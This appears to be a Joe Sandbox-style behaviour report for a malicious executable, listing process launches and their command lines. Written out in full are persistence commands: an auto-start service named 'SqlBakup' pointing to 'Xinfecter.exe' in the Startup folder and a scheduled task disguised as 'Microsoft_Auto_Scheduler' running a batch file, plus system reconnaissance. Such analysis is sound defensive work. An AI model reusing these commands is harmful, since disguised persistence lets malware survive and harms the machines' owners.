                                    General

                                    Target ID:1
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\8AbMCL2dxM.exe"
                                    Imagebase:0x8b0000
                                    File size:1'260'544 bytes
                                    MD5 hash:F383DB0B947E0BCE25A542DD7FC11139
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:2
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:3
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /v /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /i "dcdcf"
                                    Imagebase:0x640000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ver
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                    Imagebase:0xba0000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\systeminfo.exe
                                    Wow64 process (32bit):true
                                    Commandline:systeminfo
                                    Imagebase:0x50000
                                    File size:76'800 bytes
                                    MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /i "os name"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                    Imagebase:0x7ff66e660000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:24
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:25
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x340000
                                    File size:418'304 bytes
                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /v
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I /c "dcdcf"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:07:39:21
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:07:39:21
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\systeminfo.exe
                                    Wow64 process (32bit):true
                                    Commandline:systeminfo
                                    Imagebase:0x50000
                                    File size:76'800 bytes
                                    MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /i "original"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:34
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ver
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                    Imagebase:0x7ff789db0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:07:39:23
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:07:39:23
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\tasklist.exe
                                    Wow64 process (32bit):false
                                    Commandline:tasklist /v
                                    Imagebase:0x7ff65b2a0000
                                    File size:106'496 bytes
                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:41
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\find.exe
                                    Wow64 process (32bit):false
                                    Commandline:find /I /c "dcdcf"
                                    Imagebase:0x7ff784700000
                                    File size:17'920 bytes
                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:42
                                    Start time:07:39:28
                                    Start date:06/12/2024
                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                    Imagebase:0x210000
                                    File size:1'260'544 bytes
                                    MD5 hash:F383DB0B947E0BCE25A542DD7FC11139
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 76%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:43
                                    Start time:07:39:28
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:45
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:46
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:47
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:49
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:50
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:51
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:52
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:53
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:54
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:55
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:56
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:57
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:58
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:59
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:60
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0x7ff7403e0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:61
                                    Start time:07:40:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:62
                                    Start time:07:40:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph
